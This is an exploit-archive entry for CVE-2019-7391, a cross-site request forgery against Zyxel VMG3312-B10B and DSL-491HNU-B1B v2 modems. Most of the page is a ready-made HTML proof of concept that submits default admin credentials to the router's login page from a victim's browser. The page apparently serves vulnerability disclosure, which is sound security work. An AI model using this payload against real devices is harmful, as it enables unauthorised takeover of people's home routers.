zyxel vmg3312b10b dsl491hnub1b v2 modem crosssite request forgery
▸▸▸ Exploit & Vulnerability >> webapps exploit & hardware vulnerability
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit # Version: Zyxel VMG3312-B10B # Tested on : Parrot Os # Author: Yusuf Furkan # Twitter: h1_yusuf # CVE: CVE-2019-7391 # model name: DSL-491HNU-B1B v2 <html> <!-- CSRF PoC - generated by Yusuf --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/login/login-page.cgi" method="POST"> <input type="hidden" name="AuthName" value="admin" /> <input type="hidden" name="AuthPassword" value="1234" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Zyxel vmg3312b10b dsl491hnub1b v2 modem crosssite request forgery Vulnerability / Exploit Source : Zyxel vmg3312b10b dsl491hnub1b v2 modem crosssite request forgery